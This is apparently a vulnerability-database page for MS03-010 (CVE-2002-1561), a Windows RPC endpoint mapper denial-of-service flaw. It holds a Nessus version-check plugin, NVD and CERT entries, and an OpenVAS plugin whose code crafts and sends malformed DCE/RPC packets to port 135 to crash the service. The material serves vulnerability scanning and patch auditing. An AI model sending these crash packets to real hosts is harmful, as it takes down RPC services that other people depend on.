MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)
2003-03-26T00:00:00
ID SMB_NT_MS03-010.NASL Type nessus Reporter This script is Copyright (C) 2003-2018 Tenable Network Security, Inc. Modified 2021-01-02T00:00:00
Description
A flaw exists in the RPC endpoint mapper (TCP port 135) that an unauthenticated,
remote attacker can trigger with a malformed RPC packet to crash the RPC service,
disabling it and every RPC-based service the host offers.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
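if (description)
{
  script_id(11485);
  script_version("1.46");
  script_cvs_date("Date: 2018/11/15 20:50:29");

  script_cve_id("CVE-2002-1561");
  script_bugtraq_id(6005);
  script_xref(name:"MSFT", value:"MS03-010");
  script_xref(name:"CERT", value:"261537");
  script_xref(name:"MSKB", value:"331953");

  script_name(english:"MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)");
  # The body of this plugin compares the version of Rpcrt4.dll under
  # %SystemRoot%\system32; the service pack level is only used to scope
  # which hosts are in range for the bulletin.
  script_summary(english:"Checks the version of Rpcrt4.dll");

  script_set_attribute(attribute:"synopsis", value:"It is possible to disable the remote RPC service.");
  script_set_attribute(attribute:"description", value:
"A flaw exists in the RPC endpoint mapper (TCP port 135) on the remote
Windows host. An unauthenticated, remote attacker can send a malformed
RPC packet that triggers a NULL pointer dereference and terminates the
RPC service, taking down every RPC-based service the host offers and
potentially some COM functionality. CERT (VU#261537) further notes that
once the RPC service has died, an attacker may be able to take over an
orphaned named pipe and gain the privileges of that service (Local
System).");
  script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-010");
  # No patch was produced for Windows NT 4.0 (or NT 4.0 Terminal Server
  # Edition), yet this plugin still reports NT 4.0 hosts, so the solution
  # has to offer the network-level mitigation for them. The KB 814119 note
  # is the known side effect of the Windows 2000 / XP patches.
  script_set_attribute(attribute:"solution", value:
"Microsoft has released a set of patches for Windows 2000 and Windows XP.
No patch is available for Windows NT 4.0; restrict access to the RPC
endpoint mapper (TCP port 135) from untrusted networks instead. Note that
the Windows 2000 and XP patches may cause local COM calls to fail, which
can affect ASP/COM+ applications (see Microsoft Knowledge Base article
814119).");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2002/10/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2003/03/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2003/03/26");

  # "local": this is a credentialed check over SMB (registry + file
  # version), not a network probe of port 135.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
  script_family(english:"Windows : Microsoft Bulletins");

  script_dependencies("smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
  script_require_keys("SMB/MS_Bulletin_Checks/Possible");
  script_require_ports(139, 445, 'Host/patch_management_checks');
  exit(0);
}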
include("audit.inc");
include("smb_func.inc");
include("smb_hotfixes.inc");
include("smb_hotfixes_fcheck.inc");
include("misc_func.inc");
# Stop unless ms_bulletin_checks_possible.nasl established that a credentialed
# Microsoft bulletin check is feasible against this host.
get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");

bulletin = 'MS03-010';
kb = "331953";
kb_list = make_list(kb);

# When results from a patch management system are available, hand the
# bulletin/KB pair to that path first.
if (get_kb_item("Host/patch_management_checks"))
  hotfix_check_3rd_party(bulletin:bulletin, kbs:kb_list, severity:SECURITY_WARNING);

get_kb_item_or_exit("SMB/Registry/Enumerated");
get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);

# Platforms the bulletin covers: NT 4.0 SP6, Windows 2000 SP2/SP3,
# Windows XP SP0/SP1. Anything outside that range is reported as not
# vulnerable before any file is touched.
if (hotfix_check_sp_range(nt:'6', win2k:'2,3', xp:'0,1') <= 0)
  audit(AUDIT_OS_SP_NOT_VULN);

winroot = hotfix_get_systemroot();
if (!winroot) exit(1, "Failed to get the system root.");

share = hotfix_path2share(path:winroot);
if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);

# Compare Rpcrt4.dll against the first fixed build for each platform. The
# tests short-circuit left to right, so the first platform that matches
# the host decides. NOTE(review): the NT 4.0 threshold of 5.0.0.0 looks
# intended to sit above any NT 4.0 build of the file so that every NT 4.0
# host is reported -- consistent with Microsoft never shipping a patch for
# NT 4.0 (see CERT VU#261537); confirm against the include's semantics.
vulnerable =
  hotfix_is_vulnerable(os:"5.1", sp:1, file:"Rpcrt4.dll", version:"5.1.2600.1140", dir:"\system32", bulletin:bulletin, kb:kb) ||
  hotfix_is_vulnerable(os:"5.1", sp:0, file:"Rpcrt4.dll", version:"5.1.2600.105", dir:"\system32", bulletin:bulletin, kb:kb) ||
  hotfix_is_vulnerable(os:"5.0", file:"Rpcrt4.dll", version:"5.0.2195.6106", dir:"\system32", bulletin:bulletin, kb:kb) ||
  hotfix_is_vulnerable(os:"4.0", file:"Rpcrt4.dll", version:"5.0.0.0", dir:"\system32", bulletin:bulletin, kb:kb);

if (vulnerable)
{
  # Record the missing bulletin for downstream plugins, report, and leave.
  set_kb_item(name:"SMB/Missing/"+bulletin, value:TRUE);
  hotfix_security_warning();
  hotfix_check_fversion_end();
  exit(0);
}

# Not vulnerable: release the file-check session, then report as such.
hotfix_check_fversion_end();
audit(AUDIT_HOST_NOT, 'affected');
{"id": "SMB_NT_MS03-010.NASL", "bulletinFamily": "scanner", "title": "MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)", "description": "A flaw exists in the RPC endpoint mapper that can be used by an\nattacker to disable it remotely.", "published": "2003-03-26T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/11485", "reporter": "This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-010"], "cvelist": ["CVE-2002-1561"], "type": "nessus", "lastseen": "2021-01-01T05:43:21", "edition": 26, "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-1561"]}, {"type": "osvdb", "idList": ["OSVDB:13414"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231011159"]}, {"type": "cert", "idList": ["VU:261537"]}, {"type": "exploitdb", "idList": ["EDB-ID:21954", "EDB-ID:21952", "EDB-ID:21953", "EDB-ID:21951"]}, {"type": "nessus", "idList": ["MSRPC-SPIKE27.NASL"]}], "modified": "2021-01-01T05:43:21", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-01-01T05:43:21", "rev": 2}, "vulnersScore": 6.1}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11485);\n script_version(\"1.46\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2002-1561\");\n script_bugtraq_id(6005);\n script_xref(name:\"MSFT\", value:\"MS03-010\");\n script_xref(name:\"CERT\", value:\"261537\");\n script_xref(name:\"MSKB\", value:\"331953\");\n\n script_name(english:\"MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)\");\n script_summary(english:\"Checks SP version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"It is possible to disable the remote 
RPC service.\");\n script_set_attribute(attribute:\"description\", value:\n\"A flaw exists in the RPC endpoint mapper that can be used by an\nattacker to disable it remotely.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-010\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for the Windows 2000 and XP.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS03-010';\nkb = 
\"331953\";\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(nt:'6', win2k:'2,3', xp:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Rpcrt4.dll\", version:\"5.1.2600.1140\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:0, file:\"Rpcrt4.dll\", version:\"5.1.2600.105\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Rpcrt4.dll\", version:\"5.0.2195.6106\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"4.0\", file:\"Rpcrt4.dll\", version:\"5.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "pluginID": "11485", "cpe": ["cpe:/o:microsoft:windows"], "scheme": null, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}}
{"cve": [{"lastseen": "2020-10-03T11:37:00", "description": "The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference.", "edition": 3, "cvss3": {}, "published": "2003-04-02T05:00:00", "title": "CVE-2002-1561", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1561"], "modified": "2019-04-30T14:27:00", "cpe": ["cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_2000_terminal_services:*", "cpe:/o:microsoft:windows_nt:4.0"], "id": "CVE-2002-1561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1561", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_nt:4.0:sp2:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:server:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_nt:4.0:sp6:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:gold:professional:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:workstation:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_xp:*:*:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:server:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "cvelist": ["CVE-2002-1561"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nOVAL ID: 59\nMicrosoft Security Bulletin: MS03-010\nISS X-Force ID: 10400\n[CVE-2002-1561](https://vulners.com/cve/CVE-2002-1561)\nCERT VU: 261537\nBugtraq ID: 6005\n", "modified": "2002-10-18T00:00:00", "published": "2002-10-18T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:13414", "id": "OSVDB:13414", "title": "Microsoft Windows RPC Endpoint Manager Malformed Packet DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-05-29T18:31:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1561"], "description": "MS Windows RPC service (RPCSS) crashes trying to dereference a\n null pointer when it receives a certain malformed request.\n All MS RPC-based services (i.e. a large part of MS Windows 2000+)\n running on the target machine are rendered inoperable.", "modified": "2019-04-24T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011159", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011159", "type": "openvas", "title": "MS RPC Services null pointer reference DoS", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MS RPC Services null pointer reference DoS\n#\n# Authors:\n# Pavel Kankovsky, DCIT s.r.o. 
<kan@dcit.cz>\n#\n# Copyright:\n# Copyright (C) 2002 Pavel Kankovsky\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11159\");\n script_version(\"2019-04-24T07:26:10+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-24 07:26:10 +0000 (Wed, 24 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2002-1561\");\n script_xref(name:\"IAVA\", value:\"2003-t-0008\");\n script_bugtraq_id(6005);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"MS RPC Services null pointer reference DoS\");\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_copyright(\"This script is Copyright (C) 2002 Pavel Kankovsky\");\n script_family(\"Denial of Service\");\n script_dependencies(\"dcetest.nasl\");\n script_require_ports(\"Services/epmap\", 135);\n\n script_tag(name:\"solution\", value:\"Block access to TCP port 135.\");\n\n script_tag(name:\"summary\", value:\"MS Windows RPC service (RPCSS) crashes trying to dereference a\n null pointer when it receives a certain malformed request.\n All MS RPC-based services (i.e. 
a large part of MS Windows 2000+)\n running on the target machine are rendered inoperable.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\n\n# Prepare DCE BIND request\nfunction dce_bind() {\n\n # Service UUID:\n # B9E79E60-3D52-11CE-AAA1-00006901293F\n # (this is one of the services bound to port 135)\n sv_uuid = raw_string(\n 0x60, 0x9E, 0xE7, 0xB9, 0x52, 0x3D, 0xCE, 0x11,\n 0xAA, 0xA1, 0x00, 0x00, 0x69, 0x01, 0x29, 0x3F);\n # The version is incorrect \"for extra fun\" (should be 0.2)\n sv_vers = raw_string(0x02, 0x00, 0x02, 0x00);\n\n # Transfer syntar UUID:\n # 8A885D04-1CEB-11C9-9FE8-08002B104860\n ts_uuid = raw_string(\n 0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11,\n 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60);\n ts_vers = raw_string(0x02, 0x00, 0x00, 0x00);\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x0b, 0x03, # BINDPACKET, flags (1st+last frag)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0x48, 0x00, # fragment length (72)\n 0x00, 0x00, # auth length\n 0x02, 0x00, 0x00, 0x00, # call id\n 0xd0, 0x16, 0xd0, 0x16, # max xmit frag, max recv frag\n 0x00, 0x00, 0x00, 0x00, # assoc group\n 0x01, # num ctx items\n 0x00, 0x00, 0x00, # (padding)\n 0x00, 0x00, # p_cont_id\n 0x01, # n_transfer_syn\n 0x00); # (padding)\n\n return (string(req_hdr, sv_uuid, sv_vers, ts_uuid, ts_vers));\n}\n\n# Prepare evil DCE request I\nfunction attack_dce_req_1() {\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x00, 0x01, # REQUESTPACKET, flags (1st frag)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0xd0, 0x16, # fragment length (5840)\n 0x00, 0x00, # auth length\n 0x8f, 0x00, 0x00, 0x00, # call id\n 0x20, 0x27, 0x01, 0x00, # alloc hint\n 0x00, 0x00, # context id\n 0x02, 0x00, # opnum: 0\n 0xf0, 0x00, 0x00, 0x00, # ?\n 0x00, 
0x00, 0x00, 0x00, # ?\n 0x0f, 0x00, 0x00, 0x00); # ?\n\n req_dt1 = crap(data:raw_string(0x41), length:240);\n\n req_dt2 = raw_string(\n 0x88, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x88, 0x13, 0x00, 0x00);\n\n req_dt3 = crap(data:raw_string(0x42), length:5000);\n\n req_dt4 = raw_string(\n 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00);\n\n req_dt5 = crap(data:raw_string(0x43), length:512);\n\n req_dt6 = raw_string(\n 0xfe, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0xfe, 0xff, 0x00, 0x00, 0x3d, 0x3d, 0x3d, 0x3d,\n 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d,\n 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d);\n\n return(string(req_hdr, req_dt1, req_dt2, req_dt3, req_dt4, req_dt5, req_dt6));\n}\n\n# Prepare evil DCE request II\n# the size does not match fragment length?!\nfunction attack_dce_req_2(ah, stuff) {\n\n # grrr...nasl barfs on (ah/xx) & 0xff\n ah0 = ah & 0xff;\n ah1 = ah / 256; ah1 = ah1 & 0xff;\n ah2 = ah / 65536; ah2 = ah2 & 0xff;\n ah3 = ah / 16777216; ah3 = ah3 & 0xff;\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x00, 0x00, # REQUESTPACKET, flags (none)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0xd0, 0x16, # fragment length (5840...hmmm)\n 0x00, 0x00, # auth length\n 0x8f, 0x00, 0x00, 0x00, # call id\n ah0, ah1, ah2, ah3, # alloc hint\n 0x00, 0x00, # context id\n 0x02, 0x00); # opnum: ?\n\n req_dt1 = crap(data:raw_string(stuff), length:5000);\n\n return (string(req_hdr, req_dt1));\n}\n\n# Prepare evil DCE request III\n# this makes absolutely no sense, hmm...\n# the attack appears to work without it...\nfunction attack_dce_req_3() {\n\n # Request header? 
eh...sort of\n req_hdr = raw_string(\n 0x00, 0x00, 0x01, 0x10, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x01, 0x10, 0x00, 0x00);\n\n req_dt1 = crap(data:raw_string(0x48), length:5000);\n\n return (string(req_hdr, req_dt1));\n}\n\n# Carry out the attack.\nfunction attack(port) {\n\n soc = open_sock_tcp(port);\n if(!soc)\n return (1);\n\n # send bind request and check whether we got some reply\n # this is used as a liveness test\n send(socket:soc, data:dce_bind());\n r = recv(socket:soc, length:16);\n if(strlen(r) < 16)\n return (1);\n\n # send the evil packets\n send(socket:soc, data:attack_dce_req_1());\n send(socket:soc, data:attack_dce_req_2(ah:0x011050, stuff:0x44));\n send(socket:soc, data:attack_dce_req_2(ah:0xf980, stuff:0x45));\n send(socket:soc, data:attack_dce_req_2(ah:0xe2b0, stuff:0x46));\n send(socket:soc, data:attack_dce_req_2(ah:0x1560, stuff:0x47));\n send(socket:soc, data:attack_dce_req_3());\n\n close(soc);\n return (0);\n}\n\nport = get_port_for_service( default:135, proto:\"epmap\" );\n\nmaxtries = 5;\ncountdown = maxtries;\n\nwhile (countdown > 0) {\n success = attack(port:port);\n if (success) {\n if (countdown == maxtries) {\n # XXX it refuses to talk to us\n # XXX should we print a warning?\n exit(0);\n }\n security_message(port:port);\n exit(0);\n }\n countdown = countdown - 1;\n sleep(1);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:44:33", "bulletinFamily": "info", "cvelist": ["CVE-2002-1561"], "description": "### Overview \n\nThe RPC service in Microsoft Windows NT 4.0, 2000, and XP can be terminated by a specially crafted RPC message. 
A remote attacker could cause a denial of service.\n\n### Description \n\nAccording to Microsoft Security Bulletin [MS03-010](<http://www.microsoft.com/technet/security/bulletin/MS03-010.asp>), \"[Remote Procedure Call](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/rpc/rpc/how_rpc_works.asp>) (RPC) is a protocol used by the Windows operating system. RPC provides an inter-process communication mechanism that allows a program running on one computer to seamlessly execute code on a remote system.\"\n\nA vulnerability exists in a part of the RPC service called the RPC Endpoint Mapper. The RPC Endpoint Mapper listens for network requests (135/tcp), provides clients with port numbers for RPC services, and maintains information about RPC connections. According to a [report](<http://www.immunitysec.com/vulnerabilities/Immunity_svchost_DoS.txt>) from Immunity Security, vulnerable code in the RPC Endpoint Mapper dereferences a NULL pointer when processing a malformed RPC message. \n \n--- \n \n### Impact \n\nAn unauthenticated, remote attacker could cause the RPC Endpoint Mapper to terminate, denying service to legitimate users. Since the RPC Endpoint Mapper is part of the RPC service, \"...exploiting this vulnerability would cause the RPC service to fail, with the attendant loss of any RPC-based services the server offers, as well as potential loss of some COM functions.\" \nOnce the RPC service has been terminated, an attacker may be able to take control over an orphaned named pipe and gain the privileges of the RPC service (Local System). \n \n--- \n \n### Solution \n\n**Apply Patch** \nApply the appropriate patch (Q331953) as specified in [MS03-010](<http://www.microsoft.com/technet/security/bulletin/MS03-010.asp>). Microsoft notes that a patch will not be produced for Windows NT 4.0 or Windows NT 4.0 Terminal Server Edition. \nThe patches may cause local COM calls to fail, which could affect ASP/COM+ applications. 
See Microsoft Knowledgebase Article [814119](<http://support.microsoft.com/?kbid=814119>) for more information. \n \n--- \n \n \n**Block or Restrict Access** \n \nBlock or restrict access to the RPC Endpoint Mapper service (135/tcp) from untrusted networks such as the Internet. \n \n--- \n \n### Vendor Information\n\n261537\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nUpdated: March 26, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [MS03-010](<http://www.microsoft.com/technet/security/bulletin/MS03-010.asp>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23261537 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.immunitysec.com/vulnerabilities/Immunity_svchost_DoS.txt>\n * <http://www.securityfocus.com/bid/6005>\n * 